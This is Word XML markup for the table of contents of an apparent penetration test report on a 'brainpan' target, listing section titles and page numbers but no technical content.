            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061102 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AD1B842" w14:textId="3543C130" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061103" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Testing</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061103 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A96B54A" w14:textId="3F60D81B" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061104" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tester</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061104 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52B58E5B" w14:textId="5D74F337" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061105" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Report</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-4"/>
              </w:rPr>
              <w:t>Card</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061105 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A2314EC" w14:textId="1B98977A" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061106" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Black Box Penetration Test</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061106 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EE66FBC" w14:textId="097C8759" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061107" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attack Narrative</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061107 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79595C81" w14:textId="6A2654DD" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061108" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enumerating the Webserver (port 10,000)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061108 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="743EBF90" w14:textId="210662E4" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061109" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reverse Engineering brainpan.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061109 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2647FD83" w14:textId="32EBB473" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061110" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Escalation of Privileges to Root:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061110 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32D54A5B" w14:textId="3383FDD8" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061111" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061111 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B924EA4" w14:textId="5671DA31" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061112" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cleanup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061112 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76DFAB4A" w14:textId="05B82980" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061113" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061113 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DBB1B2F" w14:textId="3E68BB34" w:rsidR="0051742F" w:rsidRDefault="0051742F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc141061114" w:history="1">
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Buffer Overflow </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">xploit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF24E5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>cript:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc141061114 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002D46F4">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22897045" w14:textId="0E0ECA18" w:rsidR="00F50AB7" w:rsidRDefault="00F50AB7" w:rsidP="00F50AB7">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="49BCE3B1" w14:textId="4F2D5219" w:rsidR="004C00F2" w:rsidRDefault="004C00F2" w:rsidP="00F50AB7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="268"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc141061091"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Confidentiality </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6E77E047" w14:textId="1B7BCBA7" w:rsidR="004C00F2" w:rsidRPr="00C416A9" w:rsidRDefault="004C00F2" w:rsidP="004C00F2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="238" w:right="234"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
